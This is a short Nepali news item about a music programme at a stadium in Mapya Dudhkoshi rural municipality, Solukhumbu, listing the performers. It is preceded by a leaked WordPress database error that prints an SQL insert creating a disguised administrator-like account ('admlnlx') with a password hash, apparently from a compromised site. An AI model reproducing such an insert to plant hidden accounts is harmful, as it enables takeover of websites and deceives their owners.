WordPress database error: [Duplicate entry '0' for key 'PRIMARY']INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$BCzgntxo4fuX6fsNTQ4ooCzNlzmdgR.', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-01-30 14:43:45', '', 'admlnlx', 'admlnlx')
सोलुखुम्बु । सोलुखुम्बु जिल्लाको माप्य दुधकोशी गाउँपालिकामा फाल्गुण १ गते सांगीतिक कार्यक्रम हुने भएको छ ।
प्रथम अध्यक्ष कप तथा पन्ध्रौ राष्ट्रपती रनिङ शिल्ड प्रतियोगिताको अवसर उक्त सांगीतिक कार्यक्रम आयोजना गरिएको हो ।
माप्य दुधकोशी गाउँपालिका-४ कोर्कुमा निर्माणाधिन रंगशालामा माघ ३० गतेबाट उक्त कार्यक्रम सन्चालन हुने गाउँपालिका उपाध्यक्ष गौरब राईले बताए ।
कार्यक्रममा प्रथम नेपाली तारा दिपक लिम्बू, द भ्याइ अफ नेपाल सिजन ५ का फाइनलिस्ट कुमार प्रयास, सुनिता थेगिम, उर्मिला खालिङ, विशेष खालिङ लगायत स्थानीय कलाकारहरुको प्रस्तुती रहने आयोजक कमिटिले जनाएको छ ।